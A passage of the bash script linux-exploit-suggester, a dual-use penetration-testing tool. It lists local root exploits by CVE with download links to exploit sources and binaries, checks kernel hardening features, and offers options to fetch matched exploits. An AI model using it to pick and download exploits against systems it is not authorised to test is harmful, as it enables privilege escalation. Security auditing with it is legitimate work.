analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
exploit-db: 42275
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000370,CVE-2017-1000371]${txtrst} linux_offset2lib
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
exploit-db: 42273
author: Qualys
Comments: Uses "Stack Clash" technique
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-1000001]${txtrst} RationalLove
Reqs: pkg=glibc|libc6,ver<2.27,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,x86_64
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Rank: 1
analysis-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
src-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2018-1000001/RationalLove
exploit-db: 43775
author: halfdog
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-10900]${txtrst} vpnc_privesc.py
Reqs: pkg=networkmanager-vpnc|network-manager-vpnc,ver<1.2.6
Tags: ubuntu=16.04{network-manager-vpnc:1.1.93-1},debian=9.0{network-manager-vpnc:1.2.4-4},manjaro=17
Rank: 1
analysis-url: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
src-url: https://bugzilla.novell.com/attachment.cgi?id=779110
exploit-db: 45313
author: Denis Andzakovic
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-14665]${txtrst} raptor_xorgy
Reqs: pkg=xorg-x11-server-Xorg,cmd:[ -u /usr/bin/Xorg ]
Tags: centos=7.4
Rank: 1
analysis-url: https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
exploit-db: 45922
author: raptor
Comments: X.Org Server before 1.20.3 is vulnerable. Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-7304]${txtrst} dirty_sock
Reqs: pkg=snapd,ver<2.37,cmd:[ -S /run/snapd.socket ]
Tags: ubuntu=18.10,mint=19
Rank: 1
analysis-url: https://initblog.com/2019/dirty-sock/
exploit-db: 46361
exploit-db: 46362
src-url: https://github.com/initstring/dirty_sock/archive/master.zip
author: InitString
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-10149]${txtrst} raptor_exim_wiz
Reqs: pkg=exim|exim4,ver>=4.87,ver<=4.91
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt
exploit-db: 46996
author: raptor
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-12181]${txtrst} Serv-U FTP Server
Reqs: cmd:[ -u /usr/local/Serv-U/Serv-U ]
Tags: debian=9
Rank: 1
analysis-url: https://blog.vastart.dev/2019/06/cve-2019-12181-serv-u-exploit-writeup.html
exploit-db: 47009
src-url: https://raw.githubusercontent.com/guywhataguy/CVE-2019-12181/master/servu-pe-cve-2019-12181.c
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-12181/SUroot
author: Guy Levin (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Modified version at 'ext-url' uses bash exec technique, rather than compiling with gcc.
EOF
)
EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18862]${txtrst} GNU Mailutils 2.0 <= 3.7 maidag url local root (CVE-2019-18862)
Reqs: cmd:[ -u /usr/local/sbin/maidag ]
Tags: 
Rank: 1
analysis-url: https://www.mike-gualtieri.com/posts/finding-a-decade-old-flaw-in-gnu-mailutils
ext-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.cron.sh
src-url: https://github.com/bcoles/local-exploits/raw/master/CVE-2019-18862/exploit.ldpreload.sh
author: bcoles
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-18634]${txtrst} sudo pwfeedback
Reqs: pkg=sudo,ver<1.8.31
Tags: mint=19
Rank: 1
analysis-url: https://dylankatz.com/Analysis-of-CVE-2019-18634/
src-url: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
author: saleemrashid
Comments: sudo configuration requires pwfeedback to be enabled.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2020-9470]${txtrst} Wing FTP Server <= 6.2.5 LPE
Reqs: cmd:[ -x /etc/init.d/wftpserver ]
Tags: ubuntu=18
Rank: 1
analysis-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.php
src-url: https://www.hooperlabs.xyz/disclosures/cve-2020-9470.sh
exploit-db: 48154
author: Cary Cooper
Comments: Requires an administrator to login via the web interface.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit
Reqs: pkg=sudo,ver<1.9.5p2
Tags: mint=19,ubuntu=18|20, debian=10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
author: blasty
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3156]${txtrst} sudo Baron Samedit 2
Reqs: pkg=sudo,ver<1.9.5p2
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Rank: 1
analysis-url: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
src-url: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
author: worawit
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5618]${txtrst} setuid screen v4.5.0 LPE
Reqs: pkg=screen,ver==4.5.0
Tags: 
Rank: 1
analysis-url: https://seclists.org/oss-sec/2017/q1/184
exploit-db: https://www.exploit-db.com/exploits/41154
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
Reqs: pkg=polkit|policykit-1,ver<=0.105-31
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
Rank: 1
analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
author: berdav
EOF
)

###########################################################
## security related HW/kernel features
###########################################################
n=0

FEATURES[((n++))]=$(cat <<EOF
section: Mainline kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Kernel Page Table Isolation (PTI) support
available: ver>=4.15
enabled: cmd:grep -Eqi '\spti' /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/pti.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector support
available: CONFIG_HAVE_STACKPROTECTOR=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-regular.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: GCC stack protector STRONG support
available: CONFIG_STACKPROTECTOR_STRONG=y,ver>=3.14
analysis-url: https://github.com/mzet-/les-res/blob/master/features/stackprotector-strong.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Low address space to protect from user allocation
available: CONFIG_DEFAULT_MMAP_MIN_ADDR=[0-9]+
enabled: sysctl:vm.mmap_min_addr!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/mmap_min_addr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Prevent users from using ptrace to examine the memory and state of their processes
available: CONFIG_SECURITY_YAMA=y
enabled: sysctl:kernel.yama.ptrace_scope!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/yama_ptrace_scope.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict unprivileged access to kernel syslog
available: CONFIG_SECURITY_DMESG_RESTRICT=y,ver>=2.6.37
enabled: sysctl:kernel.dmesg_restrict!=0
analysis-url: https://github.com/mzet-/les-res/blob/master/features/dmesg_restrict.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Randomize the address of the kernel image (KASLR)
available: CONFIG_RANDOMIZE_BASE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/kaslr.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardened user copy support
available: CONFIG_HARDENED_USERCOPY=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/hardened_usercopy.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Make kernel text and rodata read-only
available: CONFIG_STRICT_KERNEL_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_kernel_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Set loadable kernel module data as NX and text as RO
available: CONFIG_STRICT_MODULE_RWX=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_module_rwx.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: BUG() conditions reporting
available: CONFIG_BUG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Additional 'cred' struct checks
available: CONFIG_DEBUG_CREDENTIALS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_credentials.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Sanity checks for notifier call chains
available: CONFIG_DEBUG_NOTIFIERS=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_notifiers.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Extended checks for linked-lists walking
available: CONFIG_DEBUG_LIST=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_list.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks on scatter-gather tables
available: CONFIG_DEBUG_SG=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/debug_sg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for data structure corruptions
available: CONFIG_BUG_ON_DATA_CORRUPTION=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bug_on_data_corruption.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Checks for a stack overrun on calls to 'schedule'
available: CONFIG_SCHED_STACK_END_CHECK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/sched_stack_end_check.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist order randomization on new pages creation
available: CONFIG_SLAB_FREELIST_RANDOM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_random.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Freelist metadata hardening
available: CONFIG_SLAB_FREELIST_HARDENED=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slab_freelist_hardened.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Allocator validation checking
available: CONFIG_SLUB_DEBUG_ON=y,cmd:! grep 'slub_debug=-' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/slub_debug.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Virtually-mapped kernel stacks with guard pages
available: CONFIG_VMAP_STACK=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/vmap_stack.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Pages poisoning after free_pages() call
available: CONFIG_PAGE_POISONING=y
enabled: cmd: grep 'page_poison=1' /proc/cmdline
analysis-url: https://github.com/mzet-/les-res/blob/master/features/page_poisoning.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Using 'refcount_t' instead of 'atomic_t'
available: CONFIG_REFCOUNT_FULL=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/refcount_full.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Hardening common str/mem functions against buffer overflows
available: CONFIG_FORTIFY_SOURCE=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/fortify_source.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict /dev/mem access
available: CONFIG_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Restrict I/O access to /dev/mem
available: CONFIG_IO_STRICT_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/io_strict_devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Hardware-based protection features:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Execution Protection (SMEP) support
available: ver>=3.0
enabled: cmd:grep -qi smep /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smep.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Supervisor Mode Access Prevention (SMAP) support
available: ver>=3.7
enabled: cmd:grep -qi smap /proc/cpuinfo
analysis-url: https://github.com/mzet-/les-res/blob/master/features/smap.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: 3rd party kernel protection mechanisms:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Grsecurity
available: CONFIG_GRKERNSEC=y
enabled: cmd:test -c /dev/grsec
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: PaX
available: CONFIG_PAX=y
enabled: cmd:test -x /sbin/paxctl
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Linux Kernel Runtime Guard (LKRG) kernel module
enabled: cmd:test -d /proc/sys/lkrg
analysis-url: https://github.com/mzet-/les-res/blob/master/features/lkrg.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
section: Attack Surface:
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: User namespaces for unprivileged accounts
available: CONFIG_USER_NS=y
enabled: sysctl:kernel.unprivileged_userns_clone==1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/user_ns.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Unprivileged access to bpf() system call
available: CONFIG_BPF_SYSCALL=y
enabled: sysctl:kernel.unprivileged_bpf_disabled!=1
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Syscalls filtering
available: CONFIG_SECCOMP=y
enabled: cmd:grep -i Seccomp /proc/self/status | awk '{print \$2}'
analysis-url: https://github.com/mzet-/les-res/blob/master/features/bpf_syscall.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/mem access
available: CONFIG_DEVMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devmem.md
EOF
)

FEATURES[((n++))]=$(cat <<EOF
feature: Support for /dev/kmem access
available: CONFIG_DEVKMEM=y
analysis-url: https://github.com/mzet-/les-res/blob/master/features/devkmem.md
EOF
)


version() {
    echo "linux-exploit-suggester "$VERSION", mzet, https://z-labs.eu, March 2019"
}

usage() {
    echo "LES ver. $VERSION (https://github.com/mzet-/linux-exploit-suggester) by @_mzet_"
    echo
    echo "Usage: linux-exploit-suggester.sh [OPTIONS]"
    echo
    echo " -V | --version               - print version of this script"
    echo " -h | --help                  - print this help"
    echo " -k | --kernel <version>      - provide kernel version"
    echo " -u | --uname <string>        - provide 'uname -a' string"
    echo " --skip-more-checks           - do not perform additional checks (kernel config, sysctl) to determine if exploit is applicable"
    echo " --skip-pkg-versions          - skip checking for exact userspace package version (helps to avoid false negatives)"
    echo " -p | --pkglist-file <file>   - provide file with 'dpkg -l' or 'rpm -qa' command output"
    echo " --cvelist-file <file>        - provide file with Linux kernel CVEs list"
    echo " --checksec                   - list security related features for your HW/kernel"
    echo " -s | --fetch-sources         - automatically downloads source for matched exploit"
    echo " -b | --fetch-binaries        - automatically downloads binary for matched exploit if available"
    echo " -f | --full                  - show full info about matched exploit"
    echo " -g | --short                 - show shorten info about matched exploit"
    echo " --kernelspace-only           - show only kernel vulnerabilities"
    echo " --userspace-only             - show only userspace vulnerabilities"
    echo " -d | --show-dos              - show also DoSes in results"
}

exitWithErrMsg() {
    echo "$1" 1>&2
    exit 1
}

# extracts all information from output of 'uname -a' command
parseUname() {
    local uname=$1

    KERNEL=$(echo "$uname" | awk '{print $3}' | cut -d '-' -f 1)
    KERNEL_ALL=$(echo "$uname" | awk '{print $3}')
    ARCH=$(echo "$uname" | awk '{print $(NF-1)}')

    OS=""
    echo "$uname" | grep -q -i 'deb' && OS="debian"
    echo "$uname" | grep -q -i 'ubuntu' && OS="ubuntu"
    echo "$uname" | grep -q -i '\-ARCH' && OS="arch"
    echo "$uname" | grep -q -i '\-deepin' && OS="deepin"
    echo "$uname" | grep -q -i '\-MANJARO' && OS="manjaro"
    echo "$uname" | grep -q -i '\.fc' && OS="fedora"
    echo "$uname" | grep -q -i '\.el' && OS="RHEL"
    echo "$uname" | grep -q -i '\.mga' && OS="mageia"

    # 'uname -a' output doesn't contain distribution number (at least not in case of all distros)
}

getPkgList() {
    local distro=$1
    local pkglist_file=$2
    
    # take package listing from provided file & detect if it's 'rpm -qa' listing or 'dpkg -l' or 'pacman -Q' listing of not recognized listing
    if [ "$opt_pkglist_file" = "true" -a -e "$pkglist_file" ]; then

        # ubuntu/debian package listing file
        if [ $(head -1 "$pkglist_file" | grep 'Desired=Unknown/Install/Remove/Purge/Hold') ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $2"-"$3}' | sed 's/:amd64//g')

            OS="debian"
            [ "$(grep ubuntu "$pkglist_file")" ] && OS="ubuntu"
        # redhat package listing file
        elif [ "$(grep -E '\.el[1-9]+[\._]' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="RHEL"
        # fedora package listing file
        elif [ "$(grep -E '\.fc[1-9]+'i "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="fedora"
        # mageia package listing file
        elif [ "$(grep -E '\.mga[1-9]+' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="mageia"
        # pacman package listing file
        elif [ "$(grep -E '\ [0-9]+\.' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $1"-"$2}')
            OS="arch"
        # file not recognized - skipping
        else
            PKG_LIST=""
        fi

    elif [ "$distro" = "debian" -o "$distro" = "ubuntu" -o "$distro" = "deepin" ]; then
        PKG_LIST=$(dpkg -l | awk '{print $2"-"$3}' | sed 's/:amd64//g')
    elif [ "$distro" = "RHEL" -o "$distro" = "fedora" -o "$distro" = "mageia" ]; then
        PKG_LIST=$(rpm -qa)
    elif [ "$distro" = "arch" -o "$distro" = "manjaro" ]; then
        PKG_LIST=$(pacman -Q | awk '{print $1"-"$2}')
    elif [ -x /usr/bin/equery ]; then
        PKG_LIST=$(/usr/bin/equery --quiet list '*' -F '$name:$version' | cut -d/ -f2- | awk '{print $1":"$2}')
    else
        # packages listing not available
        PKG_LIST=""
    fi
}

# from: https://stackoverflow.com/questions/4023830/how-compare-two-strings-in-dot-separated-version-format-in-bash
verComparision() {

    if [[ $1 == $2 ]]
    then
        return 0
    fi

    local IFS=.
    local i ver1=($1) ver2=($2)

    # fill empty fields in ver1 with zeros
    for ((i=${#ver1[@]}; i<${#ver2[@]}; i++))
    do
        ver1[i]=0
    done

    for ((i=0; i<${#ver1[@]}; i++))
    do
        if [[ -z ${ver2[i]} ]]
        then
            # fill empty fields in ver2 with zeros
            ver2[i]=0
        fi
        if ((10#${ver1[i]} > 10#${ver2[i]}))
        then
            return 1
        fi
        if ((10#${ver1[i]} < 10#${ver2[i]}))
        then
            return 2
        fi
    done

    return 0
}

doVersionComparision() {
    local reqVersion="$1"
    local reqRelation="$2"
    local currentVersion="$3"

    verComparision $currentVersion $reqVersion
    case $? in
        0) currentRelation='=';;
        1) currentRelation='>';;
        2) currentRelation='<';;
    esac

    if [ "$reqRelation" == "=" ]; then
        [ $currentRelation == "=" ] && return 0
    elif [ "$reqRelation" == ">" ]; then
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<" ]; then
        [ $currentRelation == "<" ] && return 0
    elif [ "$reqRelation" == ">=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == "<" ] && return 0
    fi
}

compareValues() {
    curVal=$1
    val=$2
    sign=$3

    if [ "$sign" == "==" ]; then
        [ "$val" == "$curVal" ] && return 0
    elif [ "$sign" == "!=" ]; then
        [ "$val" != "$curVal" ] && return 0
    fi

    return 1
}

checkRequirement() {
    #echo "Checking requirement: $1"
    local IN="$1"
    local pkgName="${2:4}"

    if [[ "$IN" =~ ^pkg=.*$ ]]; then

        # always true for Linux OS
        [ ${pkgName} == "linux-kernel" ] && return 0

        # verify if package is present 
        pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)
        if [ -n "$pkg" ]; then
            return 0
        fi

    elif [[ "$IN" =~ ^ver.*$ ]]; then
        version="${IN//[^0-9.]/}"
        rest="${IN#ver}"
        operator=${rest%$version}

        if [ "$pkgName" == "linux-kernel" -o "$opt_checksec_mode" == "true" ]; then

            # for --cvelist-file mode skip kernel version comparision
            [ "$opt_cvelist_file" = "true" ] && return 0

            doVersionComparision $version $operator $KERNEL && return 0
        else
            # extract package version and check if requiremnt is true
            pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)

            # skip (if run with --skip-pkg-versions) version checking if package with given name is installed
            [ "$opt_skip_pkg_versions" = "true" -a -n "$pkg" ] && return 0

            # versioning:
            #echo "pkg: $pkg"
            pkgVersion=$(echo "$pkg" | grep -E -i -o -e '-[\.0-9\+:p]+[-\+]' | cut -d':' -f2 | sed 's/[\+-]//g' | sed 's/p[0-9]//g')
            #echo "version: $pkgVersion"
            #echo "operator: $operator"
            #echo "required version: $version"
            #echo
            doVersionComparision $version $operator $pkgVersion && return 0
        fi
    elif [[ "$IN" =~ ^x86_64$ ]] && [ "$ARCH" == "x86_64" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^x86$ ]] && [ "$ARCH" == "i386" -o "$ARCH" == "i686" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^CONFIG_.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p set) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        # if kernel config IS available:
        if [ -n "$KCONFIG" ]; then
            if $KCONFIG | grep -E -qi $IN; then
                return 0;
            # required option wasn't found, exploit is not applicable
            else
                return 1;
            fi
        # config is not available
        else
            return 0;
        fi
    elif [[ "$IN" =~ ^sysctl:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        sysctlCondition="${IN:7}"

        # extract sysctl entry, relation sign and required value
        if echo $sysctlCondition | grep -qi "!="; then
            sign="!="
        elif echo $sysctlCondition | grep -qi "=="; then
            sign="=="
        else
            exitWithErrMsg "Wrong sysctl condition. There is syntax error in your features DB. Aborting."
        fi
        val=$(echo "$sysctlCondition" | awk -F "$sign" '{print $2}')
        entry=$(echo "$sysctlCondition" | awk -F "$sign" '{print $1}')

        # get current setting of sysctl entry
        curVal=$(/sbin/sysctl -a 2> /dev/null | grep "$entry" | awk -F'=' '{print $2}')

        # special case for --checksec mode: return 2 if there is no such switch in sysctl
        [ -z "$curVal" -a "$opt_checksec_mode" = "true" ] && return 2

        # for other modes: skip if there is no such switch in sysctl
        [ -z "$curVal" ] && return 0

        # compare & return result
        compareValues $curVal $val $sign && return 0

    elif [[ "$IN" =~ ^cmd:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        cmd="${IN:4}"
        if eval "${cmd}"; then
            return 0
        fi
    fi

    return 1
}

getKernelConfig() {

    if [ -f /proc/config.gz ] ; then
        KCONFIG="zcat /proc/config.gz"
    elif [ -f /boot/config-`uname -r` ] ; then
        KCONFIG="cat /boot/config-`uname -r`"
    elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then
        KCONFIG="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config"
    else
        KCONFIG=""
    fi
}

checksecMode() {

    MODE=0

    # start analysis
for FEATURE in "${FEATURES[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$FEATURE"

	# modes: kernel-feature (1) | hw-feature (2) | 3rdparty-feature (3) | attack-surface (4)
    NAME="${arr[0]}"
    PRE_NAME="${NAME:0:8}"
    NAME="${NAME:9}"
    if [ "${PRE_NAME}" = "section:" ]; then
		# advance to next MODE
		MODE=$(($MODE + 1))

        echo
        echo -e "${bldwht}${NAME}${txtrst}"
        echo
        continue
    fi

    AVAILABLE="${arr[1]}" && AVAILABLE="${AVAILABLE:11}"
    ENABLE=$(echo "$FEATURE" | grep "enabled: " | awk -F'ed: ' '{print $2}')
    analysis_url=$(echo "$FEATURE" | grep "analysis-url: " | awk '{print $2}')

    # split line with availability requirements & loop thru all availability reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$AVAILABLE"
    AVAILABLE_REQS_NUM=${#array[@]}
    AVAILABLE_PASSED_REQ=0
	CONFIG=""
    for REQ in "${array[@]}"; do

		# find CONFIG_ name (if present) for current feature (only for display purposes)
		if [ -z "$CONFIG" ]; then
			config=$(echo "$REQ" | grep "CONFIG_")
			[ -n "$config" ] && CONFIG="($(echo $REQ | cut -d'=' -f1))"
		fi

        if (checkRequirement "$REQ"); then
            AVAILABLE_PASSED_REQ=$(($AVAILABLE_PASSED_REQ + 1))
        else
            break
        fi
    done

    # split line with enablement requirements & loop thru all enablement reqs one by one & check whether it is met
    ENABLE_PASSED_REQ=0
    ENABLE_REQS_NUM=0
    noSysctl=0
    if [ -n "$ENABLE" ]; then
        IFS=',' read -r -a array <<< "$ENABLE"
        ENABLE_REQS_NUM=${#array[@]}
        for REQ in "${array[@]}"; do
            cmdStdout=$(checkRequirement "$REQ")
            retVal=$?
            if [ $retVal -eq 0 ]; then
                ENABLE_PASSED_REQ=$(($ENABLE_PASSED_REQ + 1))
            elif [ $retVal -eq 2 ]; then
            # special case: sysctl entry is not present on given system: signal it as: N/A
                noSysctl=1
                break
            else
                break
            fi
        done
    fi

    feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)

	if [ -n "$cmdStdout" ]; then
        if [ "$cmdStdout" -eq 0 ]; then
            state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        else
            state="[ ${txtgrn}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        fi
    else

	unknown="[ ${txtgray}Unknown${txtrst}  ]"

	# for 3rd party (3) mode display "N/A" or "Enabled"
	if [ $MODE -eq 3 ]; then
        enabled="[ ${txtgrn}Enabled${txtrst}   ]"
        disabled="[   ${txtgray}N/A${txtrst}    ]"

    # for attack-surface (4) mode display "Locked" or "Exposed"
    elif [ $MODE -eq 4 ]; then
       enabled="[ ${txtred}Exposed${txtrst}  ]"
       disabled="[ ${txtgrn}Locked${txtrst}   ]"

	#other modes" "Disabled" / "Enabled"
	else
		enabled="[ ${txtgrn}Enabled${txtrst}  ]"
		disabled="[ ${txtred}Disabled${txtrst} ]"
	fi

	if [ -z "$KCONFIG" -a "$ENABLE_REQS_NUM" = 0 ]; then
	    state=$unknown
    elif [ $AVAILABLE_PASSED_REQ -eq $AVAILABLE_REQS_NUM -a $ENABLE_PASSED_REQ -eq $ENABLE_REQS_NUM ]; then
        state=$enabled
    else
        state=$disabled
	fi

    fi

    echo -e " $state $feature ${wht}${CONFIG}${txtrst}"
    [ -n "$analysis_url" ] && echo -e "              $analysis_url"
    echo

done

}

displayExposure() {
    RANK=$1

    if [ "$RANK" -ge 6 ]; then
        echo "highly probable"
    elif [ "$RANK" -ge 3 ]; then
        echo "probable"
    else
        echo "less probable"
    fi
}

# parse command line parameters
ARGS=$(getopt --options $SHORTOPTS  --longoptions $LONGOPTS -- "$@")
[ $? != 0 ] && exitWithErrMsg "Aborting."

eval set -- "$ARGS"

while true; do
    case "$1" in
        -u|--uname)
            shift
            UNAME_A="$1"
            opt_uname_string=true
            ;;
        -V|--version)
            version
            exit 0
            ;;
        -h|--help)
            usage 
            exit 0
            ;;
        -f|--full)
            opt_full=true
            ;;
        -g|--short)
            opt_summary=true
            ;;
        -b|--fetch-binaries)
            opt_fetch_bins=true
            ;;
